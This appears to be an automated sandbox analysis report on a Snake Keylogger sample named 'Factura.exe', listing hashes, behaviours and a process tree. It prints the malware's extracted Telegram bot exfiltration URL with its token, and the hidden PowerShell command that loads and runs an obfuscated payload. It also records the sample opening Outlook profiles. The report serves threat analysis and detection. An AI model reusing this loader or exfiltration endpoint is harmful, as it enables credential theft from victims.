Analysis
-
max time kernel
142s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
15-10-2024 12:53
Static task
static1
Behavioral task
behavioral1
Sample
Factura.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Factura.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Kodrivernes.ps1
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
Kodrivernes.ps1
Resource
win10v2004-20241007-en
General
-
Target
Factura.exe
-
Size
661KB
-
MD5
ed7695b5b954ca353713414660616cae
-
SHA1
5bfb7d46c2620043abfe19337ab791358c965be6
-
SHA256
b476192616b9cece95c9071605ecce3902e64beb8e67ca7336b3f3f75411fdfe
-
SHA512
07a2a739a26eb65adfa184612df8603e51385979013803b8921ad4713fa029dca673e0c004a9c42b03a93715c9e66f717eda33008aa462288077b1674708f46d
-
SSDEEP
12288:v8KFAGRJlG+7rz/Xx5GjIW0ep9Rr2M/iTGYqWofv1zSFXMhuV+7+bY:vbY47GECyCiuW095ugcY
Malware Config
Extracted
snakekeylogger
https://api.telegram.org/bot7718195303:AAH0NmZU1fTlGiQsVioB6NIIeKKsLF_-cmM/sendMessage?chat_id=6624630813
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 2 IoCs
resource yara_rule behavioral2/memory/1688-78-0x0000000000A00000-0x0000000000A20000-memory.dmp family_snakekeylogger behavioral2/memory/1688-77-0x0000000000A00000-0x0000000001C54000-memory.dmp family_snakekeylogger -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2844 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
Blocklisted process makes network request 7 IoCs
flow pid Process 25 1688 msiexec.exe 27 1688 msiexec.exe 29 1688 msiexec.exe 31 1688 msiexec.exe 38 1688 msiexec.exe 41 1688 msiexec.exe 49 1688 msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 25 drive.google.com 24 drive.google.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 40 checkip.dyndns.org -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1688 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2844 powershell.exe 1688 msiexec.exe -
Drops file in Program Files directory 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Common Files\Gallinipper\gid.ful Factura.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File opened for modification C:\Windows\resources\0409\thermels\dekaterendes.ini Factura.exe File opened for modification C:\Windows\Fonts\choanosome\nitrosyl.ini Factura.exe File opened for modification C:\Windows\resources\0409\storewide.Riv Factura.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Factura.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 2844 powershell.exe 2844 powershell.exe 2844 powershell.exe 2844 powershell.exe 2844 powershell.exe 2844 powershell.exe 2844 powershell.exe 2844 powershell.exe 2844 powershell.exe 1688 msiexec.exe 1688 msiexec.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2844 powershell.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 2844 powershell.exe Token: SeIncreaseQuotaPrivilege 2844 powershell.exe Token: SeSecurityPrivilege 2844 powershell.exe Token: SeTakeOwnershipPrivilege 2844 powershell.exe Token: SeLoadDriverPrivilege 2844 powershell.exe Token: SeSystemProfilePrivilege 2844 powershell.exe Token: SeSystemtimePrivilege 2844 powershell.exe Token: SeProfSingleProcessPrivilege 2844 powershell.exe Token: SeIncBasePriorityPrivilege 2844 powershell.exe Token: SeCreatePagefilePrivilege 2844 powershell.exe Token: SeBackupPrivilege 2844 powershell.exe Token: SeRestorePrivilege 2844 powershell.exe Token: SeShutdownPrivilege 2844 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeSystemEnvironmentPrivilege 2844 powershell.exe Token: SeRemoteShutdownPrivilege 2844 powershell.exe Token: SeUndockPrivilege 2844 powershell.exe Token: SeManageVolumePrivilege 2844 powershell.exe Token: 33 2844 powershell.exe Token: 34 2844 powershell.exe Token: 35 2844 powershell.exe Token: 36 2844 powershell.exe Token: SeDebugPrivilege 1688 msiexec.exe -
Suspicious use of WriteProcessMemory 7 IoCs
description pid Process procid_target PID 2256 wrote to memory of 2844 2256 Factura.exe 87 PID 2256 wrote to memory of 2844 2256 Factura.exe 87 PID 2256 wrote to memory of 2844 2256 Factura.exe 87 PID 2844 wrote to memory of 1688 2844 powershell.exe 90 PID 2844 wrote to memory of 1688 2844 powershell.exe 90 PID 2844 wrote to memory of 1688 2844 powershell.exe 90 PID 2844 wrote to memory of 1688 2844 powershell.exe 90 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 msiexec.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Factura.exe"C:\Users\Admin\AppData\Local\Temp\Factura.exe"1⤵
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Nonruinous=Get-Content -raw 'C:\Users\Admin\AppData\Local\Mixende\Klausuleringerne\Kodrivernes.Leg';$Perpetuities228=$Nonruinous.SubString(53155,3);.$Perpetuities228($Nonruinous)2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Accesses Microsoft Outlook profiles
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:1688
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
51KB
MD526f8a8d3825e9c40a9a38dc4e1df576a
SHA1b374e6bd5d638466255e3045dab078925015404c
SHA2566468cdcafb15dcdcd616d53de9e64f6e56de157e47e3f23402ea281e09b2bd41
SHA512e8d5c2fc7bdc6dfc4f4b63abae2631555a0aa8080b4b8d6c6284faa23a882bd2b25acc6aeb91ca89aa0c6b74d6f4e5025532f1760e33a90dd2b931366f1db561
-
Filesize
222KB
MD542026bbb921f7b953541ee0c0ef7b3ca
SHA1079287fd76fde626c53c9157edf1e7ed75a9e1da
SHA256aaee49452ff78c0d779c67a6c0e61c54fb78e2b23ff47158af77386418b212a4
SHA512adaf5cb833b36ca6c5d40d1adc475e75106474e149c926aa26d354692780318b54291e497b13b2c321e36327548a54ecfe8eb418e1ab05e70e2756f293453e2d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82